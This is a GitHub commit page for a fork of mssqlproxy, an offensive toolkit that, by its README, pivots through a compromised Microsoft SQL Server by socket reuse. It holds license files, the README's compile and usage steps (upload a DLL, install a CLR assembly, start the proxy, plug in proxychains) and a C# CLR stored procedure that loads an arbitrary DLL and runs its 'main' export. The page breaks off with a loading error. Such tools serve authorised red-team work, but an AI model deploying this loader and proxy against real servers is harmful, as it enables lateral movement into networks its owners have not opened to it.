forked from blackarrowsec/mssqlproxy
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
xassiz
authored and
xassiz
committed
Feb 12, 2020
0 parents
commit 4698158
Showing
15 changed files
with
992 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,4 @@ | ||
| **/Release | ||
| **/Debug | ||
| **/x64 | ||
| .vs/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,84 @@ | ||
| MIT License | ||
|
|
||
| Copyright (c) 2020 BlackArrow | ||
|
|
||
| Permission is hereby granted, free of charge, to any person obtaining a copy | ||
| of this software and associated documentation files (the "Software"), to deal | ||
| in the Software without restriction, including without limitation the rights | ||
| to use, copy, modify, merge, publish, distribute, sublicense, and/or sell | ||
| copies of the Software, and to permit persons to whom the Software is | ||
| furnished to do so, subject to the following conditions: | ||
|
|
||
| The above copyright notice and this permission notice shall be included in all | ||
| copies or substantial portions of the Software. | ||
|
|
||
| THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR | ||
| IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, | ||
| FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE | ||
| AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER | ||
| LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, | ||
| OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE | ||
| SOFTWARE. | ||
|
|
||
|
|
||
|
|
||
| mssqlclient.py is based on Impacket's mssqlclient.py script | ||
| (https://github.com/SecureAuthCorp/impacket/), which is distributed under the | ||
| following license: | ||
|
|
||
| We provide this software under a slightly modified version of the | ||
| Apache Software License. The only changes to the document were the | ||
| replacement of "Apache" with "Impacket" and "Apache Software Foundation" | ||
| with "SecureAuth Corporation". Feel free to compare the resulting | ||
| document to the official Apache license. | ||
|
|
||
| The `Apache Software License' is an Open Source Initiative Approved | ||
| License. | ||
|
|
||
|
|
||
| The Apache Software License, Version 1.1 | ||
| Modifications by SecureAuth Corporation (see above) | ||
|
|
||
| Copyright (c) 2000 The Apache Software Foundation. All rights | ||
| reserved. | ||
|
|
||
| Redistribution and use in source and binary forms, with or without | ||
| modification, are permitted provided that the following conditions | ||
| are met: | ||
|
|
||
| 1. Redistributions of source code must retain the above copyright | ||
| notice, this list of conditions and the following disclaimer. | ||
|
|
||
| 2. Redistributions in binary form must reproduce the above copyright | ||
| notice, this list of conditions and the following disclaimer in | ||
| the documentation and/or other materials provided with the | ||
| distribution. | ||
|
|
||
| 3. The end-user documentation included with the redistribution, | ||
| if any, must include the following acknowledgment: | ||
| "This product includes software developed by | ||
| SecureAuth Corporation (https://www.secureauth.com/)." | ||
| Alternately, this acknowledgment may appear in the software itself, | ||
| if and wherever such third-party acknowledgments normally appear. | ||
|
|
||
| 4. The names "Impacket", "SecureAuth Corporation" must | ||
| not be used to endorse or promote products derived from this | ||
| software without prior written permission. For written | ||
| permission, please contact [email protected]. | ||
|
|
||
| 5. Products derived from this software may not be called "Impacket", | ||
| nor may "Impacket" appear in their name, without prior written | ||
| permission of SecureAuth Corporation. | ||
|
|
||
| THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED | ||
| WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES | ||
| OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | ||
| DISCLAIMED. IN NO EVENT SHALL THE APACHE SOFTWARE FOUNDATION OR | ||
| ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, | ||
| SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT | ||
| LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF | ||
| USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND | ||
| ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | ||
| OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT | ||
| OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF | ||
| SUCH DAMAGE. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,98 @@ | ||
| # mssqlproxy | ||
| []() []() | ||
|
|
||
|
|
||
|
|
||
| **mssqlproxy** is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse. The client requires [impacket](https://github.com/SecureAuthCorp/impacket) and **sysadmin** privileges on the SQL server. | ||
|
|
||
| <p align="center"> | ||
| <img src="scenario.png" width="720" > | ||
| </p> | ||
|
|
||
|
|
||
| Please read [this article](https://www.blackarrow.net/mssqlproxy-pivoting-clr/) carefully before continuing. | ||
|
|
||
| It consists of three parts: | ||
| * **CLR assembly**: Compile assembly.cs | ||
| * **Core DLL**: Compile reciclador.sln | ||
| * **Client**: mssqlclient.py (based on Impacket's example) | ||
|
|
||
| You can compile the libraries or download them from releases (x64). | ||
|
|
||
|
|
||
| Compilation | ||
| ------------ | ||
|
|
||
| To generate the core DLL, just import the project to Visual Studio (reciclador.sln) and compile it. | ||
|
|
||
| To generate the CLR assembly, first you need to find the C# compiler: | ||
| ```powershell | ||
| Get-ChildItem -Recurse "C:\Windows\Microsoft.NET\" -Filter "csc.exe" | Sort-Object fullname -Descending | Select-Object fullname -First 1 -ExpandProperty fullname | ||
| ``` | ||
|
|
||
| Then, | ||
| ```powershell | ||
| C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library .\assembly.cs | ||
| ``` | ||
|
|
||
|
|
||
| Usage | ||
| ------------ | ||
| Once the two libraries are compiled, upload the core DLL (reciclador) to the target server. | ||
|
|
||
| Authentication options are the same as the ones in [the original mssqlclient](https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py). **mssqlproxy** options: | ||
|
|
||
| ``` | ||
| proxy mode: | ||
| -reciclador path Remote path where DLL is stored in server | ||
| -install Installs CLR assembly | ||
| -uninstall Uninstalls CLR assembly | ||
| -check Checks if CLR is ready | ||
| -start Starts proxy | ||
| -local-port port Local port to listen on | ||
| -clr local_path Local CLR path | ||
| -no-check-src-port Use this option when connection is not direct (e.g. proxy) | ||
| ``` | ||
|
|
||
| We have also implemented two commands (within the SQL shell) for downloading and uploading files. Relating to the proxy stuff, we have four commands: | ||
|
|
||
| * **install**: Creates the CLR assembly and links it to a stored procedure. You need to provide the `-clr` param to read the generated CLR from a local DLL file. | ||
| * **uninstall**: Removes what **install** created. | ||
| * **check**: Checks if everything is ready to start the proxy. Requires to provide the server DLL location (`-reciclador`), which can be uploaded using the **upload** command. | ||
| * **start**: Starts the proxy. If `-local-port` is not specified, it will listen on port 1337/tcp. | ||
|
|
||
| Once the proxy is started, you can plug in your proxychains ;) | ||
|
|
||
| [](https://asciinema.org/a/298949) | ||
|
|
||
| **Note #1:** if using a non-direct connection (e.g. proxies in between), the `-no-check-src-port` flag is needed, so the server only checks the source address. | ||
|
|
||
| **Note #2:** at the moment, only IPv4 targets are supported (nor DNS neither IPv6 addresses). | ||
|
|
||
| **Important:** It's important to stop the mssqlproxy by pressing Ctrl+C on the client. If not, the server may crash and you will have to restart the MSSQL service manually. | ||
|
|
||
|
|
||
|
|
||
| Authors | ||
| --------------- | ||
| Pablo Martinez ([@xassiz](https://twitter.com/xassiz)), Juan Manuel Fernandez ([@TheXC3LL](https://twitter.com/TheXC3LL)) | ||
|
|
||
|
|
||
| References | ||
| --------------- | ||
|
|
||
| * https://www.blackhat.com/presentations/bh-asia-03/bh-asia-03-chong.pdf | ||
| * https://blog.netspi.com/attacking-sql-server-clr-assemblies/ | ||
| * https://www.codeproject.com/Articles/27298/Dynamic-Invoke-C-DLL-function-in-C | ||
| * https://x-c3ll.github.io/posts/Pivoting-MySQL-Proxy/ | ||
| * https://docs.microsoft.com/en-us/sql/ado/reference/ado-api/stream-object-ado | ||
| * https://docs.microsoft.com/es-es/sql/t-sql/functions/openrowset-transact-sql | ||
|
|
||
| License | ||
| ------- | ||
|
|
||
| All the code included in this project is licensed under the terms of the MIT license. The mssqlclient.py is based on [Impacket](https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py). | ||
|
|
||
| # | ||
|
|
||
| [](https://www.blackarrow.net) [](https://twitter.com/BlackArrowSec) [](https://www.linkedin.com/company/blackarrowsec/) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,90 @@ | ||
| /* | ||
| * Copyright (c) 2020 BlackArrow | ||
| * | ||
| * Author: | ||
| * Pablo Martinez (https://twitter.com/xassiz) | ||
| * | ||
| */ | ||
|
|
||
| using System; | ||
| using System.Data; | ||
| using System.Data.SqlClient; | ||
| using System.Data.SqlTypes; | ||
| using Microsoft.SqlServer.Server; | ||
| using System.IO; | ||
| using System.Diagnostics; | ||
| using System.Text; | ||
|
|
||
| using System.Collections.Generic; | ||
| using System.Runtime.InteropServices; | ||
| using System.Net.NetworkInformation; | ||
| using System.Net; | ||
| using System.Collections; | ||
|
|
||
|
|
||
|
|
||
| static class NativeMethods | ||
| { | ||
| [DllImport("kernel32.dll")] | ||
| public static extern IntPtr LoadLibrary(string dllToLoad); | ||
|
|
||
| [DllImport("kernel32.dll")] | ||
| public static extern IntPtr GetProcAddress(IntPtr hModule, string procedureName); | ||
|
|
||
| [DllImport("kernel32.dll")] | ||
| public static extern bool FreeLibrary(IntPtr hModule); | ||
| } | ||
|
|
||
|
|
||
|
|
||
| public partial class StoredProcedures | ||
| { | ||
| [UnmanagedFunctionPointer(CallingConvention.Cdecl)] | ||
| private delegate int main(string client_addr, int client_port); | ||
|
|
||
|
|
||
| [Microsoft.SqlServer.Server.SqlProcedure] | ||
| public static void sp_start_proxy (string path, string client_addr, int client_port) | ||
| { | ||
| string msg = "ok"; | ||
|
|
||
| IntPtr pDll = NativeMethods.LoadLibrary(path); | ||
| if(pDll == IntPtr.Zero){ | ||
| msg = "error LoadLibrary"; | ||
| } | ||
| else { | ||
| IntPtr func = NativeMethods.GetProcAddress(pDll, "main"); | ||
| if(func == IntPtr.Zero){ | ||
| msg = "error GetProcAddress"; | ||
| } | ||
| else { | ||
| main m = (main)Marshal.GetDelegateForFunctionPointer(func, typeof(main)); | ||
|
|
||
| m(client_addr, client_port); | ||
| } | ||
| NativeMethods.FreeLibrary(pDll); | ||
| } | ||
|
|
||
|
|
||
| // Create the record and specify the metadata for the columns. | ||
| SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NVarChar, 4000)); | ||
|
|
||
| // Mark the beginning of the result set. | ||
| SqlContext.Pipe.SendResultsStart(record); | ||
|
|
||
| // Set values for each column in the row | ||
| record.SetString(0, msg); | ||
|
|
||
| // Send the row back to the client. | ||
| SqlContext.Pipe.SendResultsRow(record); | ||
|
|
||
| // Mark the end of the result set. | ||
| SqlContext.Pipe.SendResultsEnd(); | ||
|
|
||
| } | ||
| }; | ||
|
|
||
|
|
||
|
|
||
|
|
||
|
|
Oops, something went wrong.